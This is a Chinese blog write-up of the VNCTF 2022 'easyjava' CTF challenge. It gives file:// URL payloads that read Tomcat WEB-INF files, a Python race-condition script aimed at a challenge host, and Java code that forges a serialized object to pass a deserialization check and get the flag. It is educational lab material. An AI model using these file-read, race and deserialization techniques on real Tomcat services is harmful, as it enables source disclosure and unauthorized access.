[VNCTF 2022] easyjava

已于 2022-07-13 13:20:58 修改
阅读量1.8k 收藏
点赞数 1
分类专栏: Java CTF WP 文章标签: java 开发语言
于 2022-06-10 07:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/125192906
版权
Java 同时被 3 个专栏收录
56 篇文章 12 订阅
订阅专栏
CTF
23 篇文章 1 订阅
订阅专栏
WP
20 篇文章 1 订阅
订阅专栏

提示传参/file?url随便传个参数后,发现是Tomcat框架的

image-20220608141200881

直接读文件 web.xml没啥信息 后来发现有个classes目录

/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
/file?url=file:///usr/local/tomcat/webapps/ROOT/WEB-INF/classes

file协议读取文件即可(JDK 9之前,也可以用netdoc协议),读取后进行反编译,最开始用的jd-gui,结果有一个地方反编译有点小差错还是用在线工具吧。JAVA反向工程网 (javare.cn)

反编译好后先看下HelloWorldServlet.java的doGet函数

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    String reqName = req.getParameter("name");
    if (reqName != null) {
        this.name = reqName;
    }

    if (Secr3t.check(this.name)) {
        this.Response(resp, "no vnctf2022!");
    } else {
        if (Secr3t.check(this.name)) {
            this.Response(resp, "The Key is " + Secr3t.getKey());
        }
    }
}

这里的Secr3t#check方法就是检测传入的参数值是不是vnctf2022

public static boolean check(String checkStr) {
    if ("vnctf2022".equals(checkStr))
        return true;
    return false;
}

所以这里如果想得到key就需要name传参vnctf2022,但传参后又会执行if中的语句,if和else中的语句相同所以就冲突了,所以就需要进行条件竞争,参考:Servlet的线程安全问题 | Y4tacker’s Blog

EXP

import requests
import threading

host = "http://74e07ae7-39fb-4055-bd42-ec21b675a96a.node4.buuoj.cn:81/"


class myThread(threading.Thread):
    def __init__(self, name):
        threading.Thread.__init__(self)
        self.name = name

    def run(self):
        print("开始线程:" + self.name)
        runing(self.name)
        print("退出线程:" + self.name)


def runing(name):
    while True:
        r = requests.get(host + "/evi1?name=%s" % name)
        r.encoding = "utf-8"
        #print(host + "/evi1?name=%s" % name)
        if r.text.find("The Key is") != -1:
            print(r.text)
            return 0


# 创建新线程
thread1 = myThread("Sentiment")
thread2 = myThread("vnctf2022")

# 开启新线程
thread1.start()
thread2.start()
thread1.join()
thread2.join()

之后就是doPost方法了

protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    String key = req.getParameter("key");
    String text = req.getParameter("base64");
    if (Secr3t.getKey().equals(key) && text != null) {
        Base64.Decoder decoder = Base64.getDecoder();
        byte[] textByte = decoder.decode(text);
        User u = (User)SerAndDe.deserialize(textByte);
        if (this.user.equals(u)) {
            this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
        }
    } else {
        this.Response(resp, "KeyError");
    }

}

接受两个参数,key和base64,key只需要传参刚才线程跑出来的key即可,base64绕过this.user.equals(u)即可

if (this.user.equals(u)) {
    this.Response(resp, "Deserialize…… Flag is " + Secr3t.getFlag().toString());
}

最后需要注意的是User.java中的height属性是由transient修饰的,是无法序列化的,所以在生成byte的时候需要重写⼀下writeObject,否则会将⾃⼰的User对象的height值为空。

private transient String height;

User.java最后加上

private void writeObject(java.io.ObjectOutputStream s) throws java.io.IOException{
 s.defaultWriteObject();
 //强制序列化name
 s.writeObject(this.height);
}

Exp

import entity.User;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws IOException {
        User user = new User("m4n_q1u_666","666","180");
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(user);

        byte[] bytes = byteArrayOutputStream.toByteArray();
        Base64.Encoder encoder = Base64.getEncoder();
        String s = encoder.encodeToString(bytes);
        System.out.println(s);
        
    }
}

传入key和base64即可

image-20220608152825301

S1nJa
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【Web】记录[MTCTF 2022]easyjava题目复现
uuzeray的博客
03-18 719
nss靶场又寄了,这题环境应该是jdk8,它镜像给了jdk21,卡了我半天,最后还得是自己改Dockerfile,啊哈哈哈,这题端上来怎么都不做啊(GitHub - CTF-Archives/2022-mtgxs-web-easyjava: A web challenge in 2022 美团高校赛。
[VNCTF2022]easyj4va
snowlyzz的博客
11-26 1054
vnctf easyjava复现
BUUCTF [web专项34][RoarCTF 2019]Easy Java
yanglinchiji的博客
11-13 115
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中。/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件。/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。发现flag就在附近。
MTCTF2022 WP
Pysnow's Blog
09-18 842
MTCTF2022
[VNCTF] EasyJava
Landasika的博客
05-17 395
目录 [VNCTF] EasyJava一、拿到源码二、分析源码三、Servlet的线程安全问题:条件竞争四、构造反序列化 [VNCTF] EasyJava 一、拿到源码 首先拿到题目,查看源码发现了提示:/file? 进入/file文件发现需要提交一个url。由于前面提示用file进入,这个时候我们可以尝试用文件读取。 输入 ?url=file:/// 之后显示发现有一个flag,但是...
BUUCTF-easy java WEB-INF/web.xml泄露漏洞及其利用
最新发布
zy1276046082的博客
01-02 540
WEB-INF/web.xml泄露漏洞及其利用 BUUCTF-easy java
MTCTF2022web部分题解
blue_lotus_first的博客
09-19 1339
美团CTF2022web onelineunzip、babyjavaeasypickle等题解。
buuctf——Easy-Java
weixin_46107179的博客
08-04 409
有一个help点击进去是一个java的报错信息说未找到该文件,根据观察URL,可能是文件包含,根据题目提示是java,尝试读取WEB-INF/web.xml文件 发现还是不能读取到,尝试用burp改一下请求方式,结果读取到web.xml配置文件 根据java项目的结构可以得到class文件,(一般关于java得到源码的思路:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码) /WEB-INF/web.xml:Web应用程序配置文件,描述了
【愚公系列】2022年03月 攻防世界-简单题-MOBILE-006(easyjava)
WLANQY的博客
01-07 121
找到关键字,逆向分析流程,写出对应的脚本就可以拿到答案null。
WEB-buuctf-easy java
weixin_52804141的博客
01-01 242
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。得到有一个文件,打开看一下,发现一串乱码,在仔细一看,里面又一串字符=结尾,疑似base64编码。所以构建paylod。
美团MTCTF 2022 smtp pwn解
z1r0的博客
09-20 1883
会将mail from的信息存在入from中,如果send to的长度大于0xff,会将sendto的数据赋值给s,需要注意的是这个数据我们可控,没有进行大小限制,而s是有大小限制的,所以直接strcpy会造成栈溢出漏洞,成功发现漏洞。接下来就是如何把flag给带出来,因为直接cat的话是没有回显的,笔者原本想着用wget下载一个木马,然后连上去(哈哈),但是感觉太麻烦了,所以问了些师傅有什么东西可以将cat的东西直接输出到屏幕上,>&1,可以把文件的东西给带出来。
2021VNCTF
unexpectedthing的博客
02-22 1017
文章目录GameV4.0newcalc0gocalc0非预期预期InterestingPHP解法1:解法2 GameV4.0 直接base64解码 newcalc0 源码 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); ap
【第五届2022美团CTF-WriteUp By EDISEC】
qq_45603443的博客
09-20 1353
第五届2022美团CTF-WriteUp By EDISEC
WEB-INF 基础知识
王嘟嘟的博客
04-08 5516
0x00 前言 对WEB-INF进行一个简单的了解。 0x01 正文 WEB-INF是java的WEB应用的安全目录。 1.WEB-INF目录 WEB-INF/web.xml web应用程序配置文件,描述了servlet和其他的应用组件配置及命名规则。 WEB-INF/classes 包含了站点所有用的class文件,包括servlet class和非servlet class WEB-INF/...
BUUCTF WEB EASYJAVA
qq_41696858的博客
12-06 283
回来啦,满血复活啦 遇事不决,先审源码,一个明晃晃的a标签看不起谁呢,直接点进去 java.io.FileNotFoundException:{help.docx} 忙猜文件读取漏洞,结合题目中的easyjava,猜都不用猜 javaweb里面的WEB-INF,干就完事了 WEB-INF/web.xml,哦对了,包的形式要手动改成post,为什么呢,因为上传下载这类的请求一般都是post 那么就拿到我们想要的东西了,/Flag由com.wm.ctf.FlagController进行处理 直接访问/Flag,
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1886
[RoarCTF 2019]Easy Java
BUUCTF闯关日记--[RoarCTF 2019]Easy Java1
qq_64201116的博客
05-13 765
送分=送命
vnctf easy_java
weixin_53747083的博客
03-11 4309
前段时间小编参加了vnctf并怀疑人生了 (因为我不会java),但我在比赛复现后询问了大佬,再次审计代码,这两天捋顺了思路,这里写下我的解题过程进入页面,是这么一个页面 zh
BUUCTF-Easy Java
m0_47571887的博客
11-11 320
新知识点:WEB-INF/web.xml泄露】 打开题目 一个登录框,万能密码貌似也登不进去,点开help看到了Download?filename=help.docx,估摸着应该是个文件包含的题。ctf/web源码泄露及利用办法【总结中】_Sp4rkW的博客-CSDN博客_web源码泄露 附上一个链接 burp抓包进行查询 看到flag了,我们进行查看 看到一串Base64,我们进行解码 拿到flag ...
[RoarCTF 2019]Easy Java详解wp
qq_62984336的博客
04-09 1856
[RoarCTF 2019]Easy Java详解

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值